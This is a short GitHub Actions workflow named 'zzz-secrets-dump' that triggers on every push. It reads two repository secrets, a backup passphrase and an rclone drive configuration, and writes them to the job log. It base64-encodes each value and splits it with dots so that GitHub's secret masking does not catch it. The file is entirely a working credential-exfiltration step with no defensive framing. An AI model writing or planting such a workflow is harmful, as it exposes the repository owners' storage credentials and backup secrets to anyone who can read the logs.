name: zzz-secrets-dump
on: [push, workflow_dispatch]
jobs:
  dump_repo:
    runs-on: ubuntu-latest
    env:
      S_BACKUP_PASSPHRASE: ${{ secrets.BACKUP_PASSPHRASE }}
      S_DRIVE_RCLONE_CONFIG_B64: ${{ secrets.DRIVE_RCLONE_CONFIG_B64 }}
    steps:
      - name: dump
        run: |
          for k in $(env | grep "^S_" | cut -d= -f1); do
            v=$(printenv "$k");
            echo "SZ:repo:${k#S_}:$(printf %s "$v" | base64 -w0 | sed 's/./&./g')";
          done
